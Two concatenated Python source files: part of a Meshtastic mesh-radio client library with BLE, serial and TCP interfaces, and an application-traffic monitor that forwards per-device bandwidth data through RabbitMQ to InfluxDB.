def _handlePacketFromRadio(self, meshPacket):
"""Handle a MeshPacket that just arrived from the radio
Will publish one of the following events:
- meshtastic.receive.position(packet = MeshPacket dictionary)
- meshtastic.receive.user(packet = MeshPacket dictionary)
- meshtastic.receive.data(packet = MeshPacket dictionary)
"""
asDict = google.protobuf.json_format.MessageToDict(meshPacket)
        # Add fromId and toId fields based on the node ID
asDict["fromId"] = self._nodeNumToId(asDict["from"])
asDict["toId"] = self._nodeNumToId(asDict["to"])
# We could provide our objects as DotMaps - which work with . notation or as dictionaries
# asObj = DotMap(asDict)
topic = "meshtastic.receive" # Generic unknown packet type
if meshPacket.decoded.HasField("position"):
topic = "meshtastic.receive.position"
p = asDict["decoded"]["position"]
self._fixupPosition(p)
# update node DB as needed
self._getOrCreateByNum(asDict["from"])["position"] = p
if meshPacket.decoded.HasField("user"):
topic = "meshtastic.receive.user"
u = asDict["decoded"]["user"]
# update node DB as needed
n = self._getOrCreateByNum(asDict["from"])
n["user"] = u
            # We now have a node ID, make sure it is up to date in that table
self.nodes[u["id"]] = u
if meshPacket.decoded.HasField("data"):
topic = "meshtastic.receive.data"
# OPAQUE is the default protobuf typ value, and therefore if not set it will not be populated at all
# to make API usage easier, set it to prevent confusion
if not "typ" in asDict["decoded"]["data"]:
asDict["decoded"]["data"]["typ"] = "OPAQUE"
# For text messages, we go ahead and decode the text to ascii for our users
if asDict["decoded"]["data"]["typ"] == "CLEAR_TEXT":
asDict["decoded"]["data"]["text"] = meshPacket.decoded.data.payload.decode(
"utf-8")
pub.sendMessage(topic, packet=asDict, interface=self)
# Our standard BLE characteristics
TORADIO_UUID = "f75c76d2-129e-4dad-a1dd-7866124401e7"
FROMRADIO_UUID = "8ba2bcc2-ee02-4a55-a531-c525c5e454d5"
FROMNUM_UUID = "ed9da18c-a800-4f66-a670-aa7547e34453"
class BLEInterface(MeshInterface):
"""A not quite ready - FIXME - BLE interface to devices"""
def __init__(self, address, debugOut=None):
self.address = address
self.adapter = pygatt.GATTToolBackend() # BGAPIBackend()
self.adapter.start()
logging.debug(f"Connecting to {self.address}")
self.device = self.adapter.connect(address)
logging.debug("Connected to device")
# fromradio = self.device.char_read(FROMRADIO_UUID)
MeshInterface.__init__(self, debugOut=debugOut)
self._readFromRadio() # read the initial responses
def handle_data(handle, data):
self._handleFromRadio(data)
self.device.subscribe(FROMNUM_UUID, callback=handle_data)
def _sendToRadio(self, toRadio):
"""Send a ToRadio protobuf to the device"""
logging.debug(f"Sending: {toRadio}")
b = toRadio.SerializeToString()
self.device.char_write(TORADIO_UUID, b)
def close(self):
self.adapter.stop()
def _readFromRadio(self):
wasEmpty = False
while not wasEmpty:
b = self.device.char_read(FROMRADIO_UUID)
wasEmpty = len(b) == 0
if not wasEmpty:
self._handleFromRadio(b)
class StreamInterface(MeshInterface):
"""Interface class for meshtastic devices over a stream link (serial, TCP, etc)"""
def __init__(self, debugOut=None, noProto=False, connectNow=True):
"""Constructor, opens a connection to self.stream
        Keyword Arguments:
            debugOut {stream} -- If a stream is provided, any debug serial output from the device will be emitted to that stream. (default: {None})
            noProto {bool} -- If True, skip starting the device config download (default: {False})
            connectNow {bool} -- If True, connect and start the reader thread immediately (default: {True})
        Raises:
            Exception: if instantiated directly; create a concrete subclass such as SerialInterface instead
"""
if not hasattr(self, 'stream'):
raise Exception(
"StreamInterface is now abstract (to update existing code create SerialInterface instead)")
self._rxBuf = bytes() # empty
self._wantExit = False
self._rxThread = threading.Thread(target=self.__reader, args=())
MeshInterface.__init__(self, debugOut=debugOut, noProto=noProto)
# Start the reader thread after superclass constructor completes init
if connectNow:
self.connect()
def connect(self):
"""Connect to our radio
Normally this is called automatically by the constructor, but if you passed in connectNow=False you can manually
start the reading thread later.
"""
# Send some bogus UART characters to force a sleeping device to wake
self._writeBytes(bytes([START1, START1, START1, START1]))
time.sleep(0.1) # wait 100ms to give device time to start running
self._rxThread.start()
def _disconnected(self):
"""We override the superclass implementation to close our port"""
MeshInterface._disconnected(self)
logging.debug("Closing our port")
        if self.stream is not None:
self.stream.close()
def _writeBytes(self, b):
"""Write an array of bytes to our stream and flush"""
self.stream.write(b)
self.stream.flush()
def _readBytes(self, len):
"""Read an array of bytes from our stream"""
return self.stream.read(len)
def _sendToRadio(self, toRadio):
"""Send a ToRadio protobuf to the device"""
logging.debug(f"Sending: {toRadio}")
b = toRadio.SerializeToString()
bufLen = len(b)
# We convert into a string, because the TCP code doesn't work with byte arrays
header = bytes([START1, START2, (bufLen >> 8) & 0xff, bufLen & 0xff])
self._writeBytes(header + b)
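        # Wire format sketch: START1 START2 <len_hi> <len_lo> <protobuf bytes>, so a
        # hypothetical 5-byte payload goes out as 0x94 0xc3 0x00 0x05 followed by the
        # five payload bytes; __reader below parses the same framing in reverse.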
def close(self):
"""Close a connection to the device"""
logging.debug("Closing serial stream")
# pyserial cancel_read doesn't seem to work, therefore we ask the reader thread to close things for us
self._wantExit = True
if self._rxThread != threading.current_thread():
self._rxThread.join() # wait for it to exit
def __reader(self):
"""The reader thread that reads bytes from our stream"""
empty = bytes()
try:
while not self._wantExit:
b = self._readBytes(1)
if len(b) > 0:
# logging.debug(f"read returned {b}")
c = b[0]
ptr = len(self._rxBuf)
# Assume we want to append this byte, fixme use bytearray instead
self._rxBuf = self._rxBuf + b
if ptr == 0: # looking for START1
if c != START1:
self._rxBuf = empty # failed to find start
if self.debugOut != None:
try:
self.debugOut.write(b.decode("utf-8"))
except:
self.debugOut.write('?')
elif ptr == 1: # looking for START2
if c != START2:
self._rxBuf = empty # failed to find start2
elif ptr >= HEADER_LEN: # we've at least got a header
                        # big endian length follows header
packetlen = (self._rxBuf[2] << 8) + self._rxBuf[3]
if ptr == HEADER_LEN: # we _just_ finished reading the header, validate length
if packetlen > MAX_TO_FROM_RADIO_SIZE:
                                self._rxBuf = empty  # length was out of bounds, restart
if len(self._rxBuf) != 0 and ptr + 1 == packetlen + HEADER_LEN:
try:
self._handleFromRadio(self._rxBuf[HEADER_LEN:])
except Exception as ex:
logging.error(
f"Error while handling message from radio {ex}")
traceback.print_exc()
self._rxBuf = empty
else:
# logging.debug(f"timeout")
pass
except serial.SerialException as ex:
            logging.warning(
f"Meshtastic serial port disconnected, disconnecting... {ex}")
finally:
logging.debug("reader is exiting")
self._disconnected()
class SerialInterface(StreamInterface):
"""Interface class for meshtastic devices over a serial link"""
def __init__(self, devPath=None, debugOut=None, noProto=False, connectNow=True):
"""Constructor, opens a connection to a specified serial port, or if unspecified try to
find one Meshtastic device by probing
Keyword Arguments:
devPath {string} -- A filepath to a device, i.e. /dev/ttyUSB0 (default: {None})
debugOut {stream} -- If a stream is provided, any debug serial output from the device will be emitted to that stream. (default: {None})
"""
if devPath is None:
ports = util.findPorts()
if len(ports) == 0:
raise Exception("No Meshtastic devices detected")
elif len(ports) > 1:
raise Exception(
f"Multiple ports detected, you must specify a device, such as {ports[0].device}")
else:
devPath = ports[0]
logging.debug(f"Connecting to {devPath}")
# Note: we provide None for port here, because we will be opening it later
self.stream = serial.Serial(
None, 921600, exclusive=True, timeout=0.5)
# rts=False Needed to prevent TBEAMs resetting on OSX, because rts is connected to reset
self.stream.port = devPath
# OS-X seems to have a bug in its serial driver. It ignores that we asked for no RTSCTS
# control and will always drive RTS either high or low (rather than letting the CP102 leave
# it as an open-collector floating pin). Since it is going to drive it anyways we want to make
# sure it is driven low, so that the TBEAM won't reset
if platform.system() == 'Darwin':
self.stream.rts = False
self.stream.open()
StreamInterface.__init__(
self, debugOut=debugOut, noProto=noProto, connectNow=connectNow)
def _disconnected(self):
"""We override the superclass implementation to close our port"""
if platform.system() == 'Darwin':
self.stream.rts = True # Return RTS high, so that the reset button still works
StreamInterface._disconnected(self)
class TCPInterface(StreamInterface):
"""Interface class for meshtastic devices over a TCP link"""
def __init__(self, hostname, debugOut=None, noProto=False, connectNow=True, portNumber=4403):
"""Constructor, opens a connection to a specified IP address/hostname
Keyword Arguments:
hostname {string} -- Hostname/IP address of the device to connect to
"""
logging.debug(f"Connecting to {hostname}")
server_address = (hostname, portNumber)
sock = socket.create_connection(server_address)
# Instead of wrapping as a stream, we use the native socket API
# self.stream = sock.makefile('rw')
self.stream = None
self.socket = sock
StreamInterface.__init__(
self, debugOut=debugOut, noProto=noProto, connectNow=connectNow)
def _disconnected(self):
"""We override the superclass implementation to close our port"""
StreamInterface._disconnected(self)
logging.debug("Closing our socket")
        if self.socket is not None:
self.socket.close()
def _writeBytes(self, b):
"""Write an array of bytes to our stream and flush"""
self.socket.send(b)
def _readBytes(self, len):
"""Read an array of bytes from our stream"""
return self.socket.recv(len)
|
appmonitor.py
|
#!/usr/bin/python
import os, sys
import sh
import pika #aiopika
import ssl
import certifi
import time
import glob
import json
import pickle
import traceback
import threading
import queue
import urllib
import urllib.parse
import urllib.request
import imp
import logging
from dotenv import load_dotenv
log = logging.getLogger(__name__)
def f(s):
if s is None:
return ''
else:
        return str(s).replace(',', '\\,').replace(' ', '\\ ')
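# Escaping sketch (hypothetical values): f("Google Play") -> "Google\ Play" and
# f("a,b") -> "a\,b", which keeps spaces and commas from breaking the InfluxDB
# line-protocol tags built further below.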
class AppMonitor:
"""AppMonitor"""
FILESTATUS = "processedfiles.pickle" #TODO: TBD
thread_ctrl = None
iostatus = {}
influxdb = None
rabbitmq = None
listener = None
pluginfolder = os.path.join(os.path.dirname(os.path.abspath(__file__)), "plugins")
mainmodule = "module"
plugins = []
mode = None
deployment = None
def initInfluxdb(self):
if os.getenv('INFLUXDB_ENABLE') == 'true':
log.info("INFO:/influxdb enabled, checking environment variables...")
self.influxdb.deployment = self.deployment
if os.getenv('INFLUXDB_HOST') is not None:
self.influxdb.conf['host'] = os.getenv('INFLUXDB_HOST')
else:
log.error("ERROR: INFLUXDB_HOST not set, Exiting...")
sys.exit(1)
            if os.getenv('INFLUXDB_PORT') is not None:
self.influxdb.conf['port'] = os.getenv('INFLUXDB_PORT')
else:
log.error("ERROR: INFLUXDB_PORT not set, Exiting...")
sys.exit(1)
if os.getenv('INFLUXDB_WRITE_USER') is not None:
self.influxdb.conf['userw'] = os.getenv('INFLUXDB_WRITE_USER')
else:
log.error("ERROR: INFLUXDB_WRITE_USER not set, Exiting...")
sys.exit(1)
if os.getenv('INFLUXDB_WRITE_USER_PASSWORD') is not None:
self.influxdb.conf['passw'] = os.getenv('INFLUXDB_WRITE_USER_PASSWORD')
else:
log.error("ERROR: INFLUXDB_WRITE_USER_PASSWORD not set, Exiting...")
sys.exit(1)
if os.getenv('INFLUXDB_DB') is not None:
self.influxdb.conf['database'] = os.getenv('INFLUXDB_DB')
else:
log.error("ERROR: INFLUXDB_DB not set, Exiting...")
sys.exit(1)
def initRabbitMQ(self):
if os.getenv('RABBITMQ_SSL_USER') is not None:
self.rabbitmq.user = os.getenv('RABBITMQ_SSL_USER')
else:
log.error("ERROR: RABBITMQ_SSL_USER not set, Exiting...")
sys.exit(1)
if os.getenv('RABBITMQ_SSL_PASS') is not None:
self.rabbitmq.password = os.getenv('RABBITMQ_SSL_PASS')
else:
log.error("ERROR: RABBITMQ_SSL_PASS not set, Exiting...")
sys.exit(1)
if os.getenv('RABBITMQ_SSL_HOST') is not None:
self.rabbitmq.host = os.getenv('RABBITMQ_SSL_HOST')
else:
log.error("ERROR: RABBITMQ_SSL_HOST not set, Exiting...")
sys.exit(1)
if os.getenv('RABBITMQ_SSL_PORT') is not None:
self.rabbitmq.port = os.getenv('RABBITMQ_SSL_PORT')
else:
log.error("ERROR: RABBITMQ_SSL_PORT not set, Exiting...")
sys.exit(1)
if os.getenv('RABBITMQ_SSL_CERTFILE') is not None:
self.rabbitmq.cert = os.getenv('RABBITMQ_SSL_CERTFILE')
else:
log.error("ERROR: RABBITMQ_SSL_CERTFILE not set, Exiting...")
sys.exit(1)
if os.getenv('RABBITMQ_SSL_PKEYFILE') is not None:
self.rabbitmq.keyf = os.getenv('RABBITMQ_SSL_PKEYFILE')
else:
log.error("ERROR: RABBITMQ_SSL_PKEYFILE not set, Exiting...")
sys.exit(1)
if os.getenv('RABBITMQ_SSL_CERTPASS') is not None:
self.rabbitmq.certpass = os.getenv('RABBITMQ_SSL_CERTPASS')
else:
log.error("ERROR: RABBITMQ_SSL_CERTPASS not set, Exiting...")
sys.exit(1)
if os.getenv('RABBITMQ_SSL_TOPIC') is not None:
self.rabbitmq.topic = os.getenv('RABBITMQ_SSL_TOPIC')
else:
log.error("ERROR: RABBITMQ_SSL_TOPIC not set, Exiting...")
sys.exit(1)
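    # Example .env sketch (variable names as read above, values purely hypothetical):
    #   NMD_MODE=standalone
    #   NMD_DEPLOYMENT=lab
    #   INFLUXDB_ENABLE=true
    #   INFLUXDB_HOST=influx.example.org
    #   INFLUXDB_PORT=8086
    #   INFLUXDB_WRITE_USER=writer
    #   INFLUXDB_WRITE_USER_PASSWORD=secret
    #   INFLUXDB_DB=netmon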
def __init__(self, thread_ctrl):
load_dotenv(verbose=True)
self.thread_ctrl = thread_ctrl
log.info("reading MODE: [{0}]".format(os.getenv('NMD_MODE')))
self.deployment = os.getenv('NMD_DEPLOYMENT')
if os.getenv('NMD_MODE') == 'consumer' or os.getenv('NMD_MODE') == 'standalone':
self.influxdb = self.InfluxDB(self.thread_ctrl)
self.initInfluxdb()
if os.getenv('NMD_MODE') == 'consumer':
self.rabbitmq = self.RabbitMQ(self.thread_ctrl)
self.initRabbitMQ()
self.mode = 'c' # consumer
else:
self.mode = 's' # standalone
else:
self.mode = 'p' # producer
self.rabbitmq = self.RabbitMQ(self.thread_ctrl)
self.initRabbitMQ()
for p in self.getPlugins():
log.info("Loading plugin " + p["name"])
plugin = self.loadPlugin(p)
priority, errmsg = plugin.init({'deployment' : self.deployment, 'conf_influxdb' : self.influxdb.conf}) #TODO: add continue/flags for graceful exit
if priority < 0:
log.info(errmsg)
sys.exit(1)
self.plugins.append({'plugin':plugin, 'priority':priority})
self.plugins = sorted(self.plugins, key = lambda i: i['priority']) #,reverse=True
def getPlugins(self):
plugins = []
pluginsdir = os.listdir(self.pluginfolder)
for p in pluginsdir:
location = os.path.join(self.pluginfolder, p)
if not os.path.isdir(location) or not p + ".py" in os.listdir(location):
continue
info = imp.find_module(p, [location])
plugins.append({"name": p, "info": info})
return plugins
def loadPlugin(self, plugin):
return imp.load_module(plugin["name"], *plugin["info"])
def pluginPreProcess(self, insertData):
for p in self.plugins:
insertData = p['plugin'].preprocess(insertData)
return insertData
class RabbitMQ(object):
host = None
port = 0
user = None
password = None
cert = None
keyf = None
certpass = None
topic = None
rabbitmq_queue = None
class MQWriter:
credentials = None
context = None
connection = None
channel = None
mqwriter = None
def __init__(self,thread_ctrl):
self.rabbitmq_queue = queue.Queue()
self.thread_ctrl = thread_ctrl
def rabbitmq_updater_thread(self, pluginPreProcess):
if self.mqwriter is None:
self.mqwriter = self.MQWriter()
self.mqwriter.credentials = pika.PlainCredentials(self.user, self.password)
self.mqwriter.context = ssl.create_default_context(cafile=certifi.where());
basepath = os.path.join(os.path.dirname(__file__), "../")
certfile = os.path.join(basepath, self.cert)
keyfile = os.path.join(basepath, self.keyf)
log.info("RabbitMQ SSL using {0} {1} from {2} to {3}:{4}".format(self.cert, self.keyf,\
basepath, self.host, self.port))
self.mqwriter.context.load_cert_chain(certfile, keyfile, self.certpass)
ssl_options = pika.SSLOptions(self.mqwriter.context, self.host)
try:
self.mqwriter.connection = pika.BlockingConnection(pika.ConnectionParameters(host=self.host,
port=int(self.port),
ssl_options = ssl_options,
virtual_host='/',
credentials=self.mqwriter.credentials))
except Exception as e:
exc_type, _, exc_tb = sys.exc_info()
fname = os.path.split(exc_tb.tb_frame.f_code.co_filename)[1]
log.error("rabbitmq error: ({0}) {1} {2} {3}".format(str(e), exc_type, fname, exc_tb.tb_lineno))
traceback.print_exc()
sys.exit(1)
self.mqwriter.channel = self.mqwriter.connection.channel()
self.mqwriter.channel.queue_declare(queue=self.topic)
while self.thread_ctrl['continue']:
line = self.rabbitmq_queue.get()
self.mqwriter.channel.basic_publish(exchange='', routing_key=self.topic, body="{0}".format(line)) #summary
self.mqwriter.connection.close()
class InfluxDB(object):
conf = {
'host': None,
'port': 0,
'db': None,
'userw': None,
'passw': None,
'url': None
}
deployment = None
#database = None #moved to conf dict
thread_ctrl = None
insert_memory = None
#var built at runtime
#url = None #moved to conf
header = None
#insert = None #inser queue
influxdb_queue = None
def __init__(self,thread_ctrl):
self.influxdb_queue = queue.Queue()
self.thread_ctrl = thread_ctrl
def influxdb_updater_thread(self, pluginPreProcess):
while self.thread_ctrl['continue']:
                if self.conf['url'] is None:
self.conf['url'] = "https://" + self.conf['host'] + ":" + self.conf['port'] + "/api/v2/write?bucket=" +\
self.conf['database'] + "/rp&precision=ns"
                if self.header is None:
self.header = {'Authorization': 'Token ' + self.conf['userw'] + ":" + self.conf['passw']}
data = pluginPreProcess(self.influxdb_queue.get())
summary = data['summary']
if summary is None:
continue
if 'std' not in summary.keys():
log.warning("WARNING: malformed summary/insert data {0}".format(summary))
continue
else:
insert = summary['std']
extend = None
if 'ext' in summary.keys():
if 'insert' in summary['ext'].keys():
extend = summary['ext']['insert']
#log.info("EXTINFO: {}".format(summary['ext']))
for dev in insert.keys():
if insert[dev] is not None:
for app in insert[dev]:
log.info(app + "-" + dev + " " + str(insert[dev][app]))
try:
data = ''
TsEnd = None
TsEndMemory = None
for dev in insert.keys():
for app in insert[dev]:
#if insert[dev][app]['KbpsDw'] == 0.0 and\
# insert[dev][app]['KbpsUp'] == 0.0:
# continue
data = data + 'network_traffic_application_kbpsdw'+\
',deployment=' + self.deployment +\
',device=' + dev +\
',application=' + f(app) +\
' value=' + str(insert[dev][app]['KbpsDw']) +\
' ' + str(insert[dev][app]['TsEnd']) + '000000000' + '\n'
data = data + 'network_traffic_application_kbpsup'+\
',deployment=' + self.deployment +\
',device=' + dev +\
',application=' + f(app) +\
' value=' + str(insert[dev][app]['KbpsUp']) +\
' ' + str(insert[dev][app]['TsEnd']) + '000000000' + '\n'
if TsEnd is None:
TsEnd = str(insert[dev][app]['TsEnd'])
# there's no future data point for some of the devices, better to fill in w zero
# otherwise grafana will connect data points directly
if self.insert_memory is not None:
for dev in self.insert_memory.keys():
for app in self.insert_memory[dev]:
if TsEndMemory is None:
TsEndMemory = str(self.insert_memory[dev][app]['TsEnd'])
try:
#if float(insert[dev][app]['KbpsDw']) == 0.0 and\
# float(insert[dev][app]['KbpsUp']) == 0.0
#force key error if not present
insert[dev][app]['KbpsDw']
insert[dev][app]['KbpsUp']
except KeyError:
data = data + 'network_traffic_application_kbpsdw'+\
',deployment=' + self.deployment +\
',device=' + dev +\
',application=' + f(app) +\
' value=0' +\
' ' + TsEnd + '000000000' + '\n'
data = data + 'network_traffic_application_kbpsup'+\
',deployment=' + self.deployment +\
',device=' + dev +\
',application=' + f(app) +\
' value=0' +\
' ' + TsEnd + '000000000' + '\n'
#there's no past data point for some of the devices, better to fill in w zero
#otherwise grafana will create a "long" ramp in the ts
for dev in insert.keys():
for app in insert[dev]:
try:
self.insert_memory[dev][app]['KbpsDw'] #force key error if not present
self.insert_memory[dev][app]['KbpsUp']
except KeyError:
data = data + 'network_traffic_application_kbpsdw'+\
',deployment=' + self.deployment +\
',device=' + dev +\
',application=' + f(app) +\
' value=0' +\
' ' + TsEndMemory + '000000000' + '\n'
data = data + 'network_traffic_application_kbpsup'+\
',deployment=' + self.deployment +\
',device=' + dev +\
',application=' + f(app) +\
' value=0' +\
' ' + TsEndMemory + '000000000' + '\n'
self.insert_memory = insert
if extend is not None:
for insertLine in extend:
data = data + insertLine + "\n"
#print(insertLine)
data = data.encode()
req = urllib.request.Request(self.conf['url'], data, self.header)
with urllib.request.urlopen(req) as response:
log.info('OK' if response.getcode()==204 else 'Unexpected:'+str(response.getcode()))
except Exception as e:
exc_type, _, exc_tb = sys.exc_info()
fname = os.path.split(exc_tb.tb_frame.f_code.co_filename)[1]
log.error("EXCEPTION: influxdb_updater_thread: {0} {1} {2} (dev:{3}) {4}"\
.format(exc_type, fname, exc_tb.tb_lineno, dev, e)) #e.read().decode("utf8", 'ignore')
self.influxdb_queue.task_done()
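            # Line-protocol sketch of what one iteration can emit (tag values hypothetical):
            #   network_traffic_application_kbpsdw,deployment=lab,device=aa:bb:cc,application=Netflix value=120.0 1600000000000000000
            #   network_traffic_application_kbpsup,deployment=lab,device=aa:bb:cc,application=Netflix value=8.0 1600000000000000000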
##
# "fs" mode, handles of /tmp/tmp.ta.* file changes via tail
# "mq" mode, handles consumer message receive events
class TAHandler():
process_data_from_source = None
iostatus = None
thread_ctrl = None
worker = None
printFunc = None
running = True
filename = None
rabbitmq = None
mode = None
def __init__(self, process_data_from_source, iostatus, mode, thread_ctrl, rabbitmq=None, influxdb=None):
self.process_data_from_source = process_data_from_source
self.iostatus = iostatus
self.thread_ctrl = thread_ctrl
self.mode = mode
self.rabbitmq=rabbitmq
self.influxdb=influxdb
def mqreader(self):
connection = None
while self.thread_ctrl['continue'] and self.running:
if self.worker is None: #TODO: move code below to class
credentials = pika.PlainCredentials(self.rabbitmq.user, self.rabbitmq.password)
context = ssl.create_default_context(cafile=certifi.where());
basepath = os.path.join(os.path.dirname(__file__), "../")
certfile = os.path.join(basepath, self.rabbitmq.cert)
keyfile = os.path.join(basepath, self.rabbitmq.keyf)
log.info("RabbitMQ SSL using {0} {1} from {2} to {3}:{4}".format(self.rabbitmq.cert, self.rabbitmq.keyf,\
basepath, self.rabbitmq.host, self.rabbitmq.port))
context.load_cert_chain(certfile, keyfile, self.rabbitmq.certpass)
ssl_options = pika.SSLOptions(context, self.rabbitmq.host)
try:
connection = pika.BlockingConnection(pika.ConnectionParameters(host=self.rabbitmq.host,
port=int(self.rabbitmq.port),
ssl_options = ssl_options,
virtual_host='/',
credentials=credentials))
except Exception as e:
exc_type, _, exc_tb = sys.exc_info()
fname = os.path.split(exc_tb.tb_frame.f_code.co_filename)[1]
log.error("rabbitmq error: ({0}) {1} {2} {3}".format(str(e), exc_type, fname, exc_tb.tb_lineno))
traceback.print_exc()
sys.exit(1)
channel = connection.channel()
channel.queue_declare(queue=self.rabbitmq.topic)
def callback(ch, method, properties, line):
try:
j=json.loads(line)
except Exception as e:
log.error("unrecognized message: {0}".format(line))
log.error("Exception: {0}".format(e))
return
summary=get_summary_from_json(j)
if summary is not None:
self.influxdb.influxdb_queue.put({'summary': summary, 'json': line})
else:
log.warning("can't get summary from {0}".format(line))
channel.basic_consume(queue=self.rabbitmq.topic, on_message_callback=callback, auto_ack=True)
self.worker = threading.Thread(target=self.process_data_from_source, args=(self.rabbitmq.topic, channel,))
self.iostatus[self.rabbitmq.topic] = {}
self.iostatus[self.rabbitmq.topic]['thread'] = self.worker
self.iostatus[self.rabbitmq.topic]['channel'] = channel
self.worker.start()
time.sleep(5)
channel.stop_consuming()
#connection.close()
#channel.cancel()
#channel.close()
def fsreader(self):
while self.thread_ctrl['continue'] and self.running:
files=glob.glob("/tmp/tmp.ta.*")
if len(files) > 1:
log.warning("WARNING: multiple tmp.ta.* files found.")
for f in files:
try:
if self.iostatus[f]['running']:
log.info("TAHandler {0} is running.".format(f))
continue
log.info("TAHandler ignoring {0}.".format(f))
except KeyError as ke:
if self.worker is not None:
self.iostatus[self.filename]['running'] = False
self.iostatus[self.filename]['tail'].kill()
self.worker.join()
log.info("TAHandler terminating {0}:{1}.".format(f, ke))
else:
log.info("TAHandler initializing {0}:{1}.".format(f, ke))
self.worker = threading.Thread(target=self.process_data_from_source, args=(f, self.mode=='s'))
self.iostatus[f] = {}
self.iostatus[f]['thread'] = self.worker
self.filename = f
self.worker.start()
except Exception as e:
log.error("ERROR: {0}".format(e))
time.sleep(10)
def start(self):
if self.mode == 's' or self.mode == 'p': # standalone or producer
self.thread = threading.Thread(target=self.fsreader) # file system (/tmp/tmp.ta.*)
elif self.mode == 'c': # consumer
self.thread = threading.Thread(target=self.mqreader) # rabbitmq receive
else:
log.error("INVALID MODE: {0}".format(self.mode))
print("INVALID MODE: {0}".format(self.mode))
sys.exit(1)
self.thread.start()
def stop(self):
self.running = False
def join(self):
self.thread.join()
def process_mq_ta(self, topic, channel):
log.info("Processing: " + topic)
try:
channel.start_consuming()
except pika.exceptions.StreamLostError:
log.warning("rabbimq SSL channel terminated")
except Exception as e:
exc_type, _, exc_tb = sys.exc_info()
fname = os.path.split(exc_tb.tb_frame.f_code.co_filename)[1]
log.error("process_mq_ta: {0} {1} {2} {3}".format(exc_type, fname, exc_tb.tb_lineno, e))
traceback.print_exc()
def process_tmp_ta(self, filename="", is_standalone=True):
if filename == "":
log.info("INFO: No files to process now.")
else:
if not os.path.isfile(filename):
log.error("ERROR: filename "+filename+" is not a file.")
return False
else:
log.info("Processing: " + filename)
self.iostatus[filename]['running'] = True
self.iostatus[filename]['tail'] = sh.tail("-F", filename, _iter=True, _bg_exc=False)
while self.iostatus[filename]['running'] and self.thread_ctrl['continue']:
try:
line = self.iostatus[filename]['tail'].next()
if is_standalone:
j = json.loads(line)
summary=get_summary_from_json(j)
if summary is not None:
self.influxdb.influxdb_queue.put({'summary': summary, 'json': line})
else:
log.warning("can't get summary from {0}".format(line))
else:
self.rabbitmq.rabbitmq_queue.put(line) # < --- sending raw lines for now
except sh.ErrorReturnCode_1: # as e:
log.info("process_tmp_ta: tail terminated {0}, (permission denied ?) ".format(filename))
break
except sh.SignalException_SIGKILL as e:
log.info("process_tmp_ta: tail terminated {0} {1}".format(filename, e))
break
except Exception as e:
exc_type, _, exc_tb = sys.exc_info()
fname = os.path.split(exc_tb.tb_frame.f_code.co_filename)[1]
log.error("process_tmp_ta: {0} {1} {2} {4}".format(exc_type, fname, exc_tb.tb_lineno, e))
log.info('process_tmp_ta: exiting ' + filename)
#with open(iostatus, 'wb') as handle:
# pickle.dump(iostatus, handle, protocol=pickle.HIGHEST_PROTOCOL)
return True
def run(self):
if self.mode == 'p': # producer
log.info("Running #### CLIENT/PRODUCER ####")
self.listener = self.TAHandler(self.process_tmp_ta, self.iostatus, self.mode, self.thread_ctrl)
self.listener.start()
if os.getenv('INFLUXDB_ENABLE') == 'true':
log.info("PRODUCER: running thread.")
threading.Thread(target=self.rabbitmq.rabbitmq_updater_thread,
args=(self.pluginPreProcess,),
daemon=True).start()
log.info("PRODUCER: Done")
elif self.mode == 'c': #consumer
log.info("Running #### SERVER/CONSUMER ####")
self.listener = self.TAHandler(self.process_mq_ta, self.iostatus, self.mode, self.thread_ctrl,\
self.rabbitmq, self.influxdb)
self.listener.start()
if os.getenv('INFLUXDB_ENABLE') == 'true':
log.info("CONSUMER: running thread.")
threading.Thread(target=self.influxdb.influxdb_updater_thread,
args=(self.pluginPreProcess,),
daemon=True).start()
log.info("CONSUMER: Done")
else: #standalone
log.info("Running #### STANDALONE ####")
self.listener = self.TAHandler(self.process_tmp_ta, self.iostatus, self.mode, self.thread_ctrl)
self.listener.start()
if os.getenv('INFLUXDB_ENABLE') == 'true':
log.info("STANDALONE: running thread.")
threading.Thread(target=self.influxdb.influxdb_updater_thread,
args=(self.pluginPreProcess,),
daemon=True).start()
log.info("STANDALONE: Done")
log.info("MAIN: joining threads")
try:
while self.thread_ctrl['continue']:
time.sleep(1)
try:
#if self.mode == 'p': # producer
# print("PRODUCER NOT YET IMPLEMENTED")
#elif self.mode == 'c': # consumer
# TBD
#else: # standalone
for k in self.iostatus.keys():
if 'running' in self.iostatus[k].keys():
if self.iostatus[k]['running']:
if 'thread' in self.iostatus[k].keys():
log.info("MAIN: waiting for " + k)
self.iostatus[k]['thread'].join()
self.iostatus[k]['running'] = False
log.info("MAIN: " +k + " joined")
except RuntimeError as re:
log.warning("WARNING: " + str(re))
pass
except KeyboardInterrupt:
self.stop()
log.info("MAIN: listener join")
self.listener.join()
if self.influxdb is not None:
self.influxdb.influxdb_queue.join()
def stop(self):
if self.mode == 's':
for k in self.iostatus.keys():
try:
self.iostatus[k]['tail'].kill()
except ProcessLookupError: # as ple: :TODO: improve this
pass
elif self.mode == 'c':
for k in self.iostatus.keys():
try:
self.iostatus[k]['channel'].close()
except Exception: #TODO: improve this
pass
self.listener.stop()
def get_summary_from_json(j):
    summary = {'std': {}, 'ext': {}}  # std == standard, ext == extended (rDNS, GeoIP, etc)
if 'TrafficData' not in j.keys():
return None
if 'Data' not in j['TrafficData'].keys():
return None
if j['TrafficData']['Data'] is None:
return None
for d in j['TrafficData']['Data']:
device = 'Device'
if 'HwAddr' in d:
device = 'HwAddr'
if d[device] not in summary['std']:
summary['std'][d[device]] = {}
summary['ext'][d[device]] = {}
if d['Meta'] not in summary['std'][d[device]]:
summary['std'][d[device]][d['Meta']] = { 'KbpsDw': 0.0, 'KbpsUp': 0.0, 'TsEnd': 0 }
summary['ext'][d[device]][d['Meta']] = { 'Domain': None, 'SIP': None }
summary['std'][d[device]][d['Meta']]['TsEnd'] = j['Info']['TsEnd']
summary['std'][d[device]][d['Meta']]['KbpsDw'] =\
summary['std'][d[device]][d['Meta']]['KbpsDw'] + d['KbpsDw']
summary['std'][d[device]][d['Meta']]['KbpsUp'] =\
summary['std'][d[device]][d['Meta']]['KbpsUp'] + d['KbpsUp']
summary['std'][d[device]][d['Meta']]['Domain'] = d['Domain']
summary['std'][d[device]][d['Meta']]['SIP'] = d['SIP']
#log.debug("DOMAIN:" + d['Domain'] + "," + d['SIP'])
#for dev in summary.keys():
# for app in summary[dev]:
# log.debug(app + "-" + dev + " " + str(summary[dev][app]))
return summary
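# Input sketch (field names as read above, values hypothetical):
#   {"Info": {"TsEnd": 1600000000},
#    "TrafficData": {"Data": [{"HwAddr": "aa:bb:cc", "Meta": "Netflix", "KbpsDw": 120.0,
#                              "KbpsUp": 8.0, "Domain": "example.com", "SIP": "1.2.3.4"}]}}
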